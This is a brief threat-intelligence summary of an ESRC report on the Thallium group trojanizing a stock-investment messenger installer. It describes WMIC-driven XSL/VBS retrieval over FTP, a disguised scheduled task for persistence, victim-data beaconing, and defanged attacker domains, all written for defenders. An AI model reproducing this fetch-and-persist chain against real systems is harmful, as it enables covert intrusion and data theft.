ESRC reported that the North Korea-linked Thallium group modified a private stock-investment messenger installer to conduct a software supply-chain attack, expanding beyond its usual spear-phishing activity. The NSIS installer executed wmic.exe to retrieve remote XSL/VBS commands over FTP, created ProgramData folders such as OracleCache, PackageUninstall, and USODrive, and contacted frog.smtper[.]co for follow-on commands. Persistence was established through a scheduled task named Office365__ that repeatedly ran usopub.vbs and used WMIC to beacon to the attacker-controlled FTP path with victim PC information. ESRC also observed malicious documents using the same XSL Script Processing technique and noted search.greenulz[.]com as related infrastructure.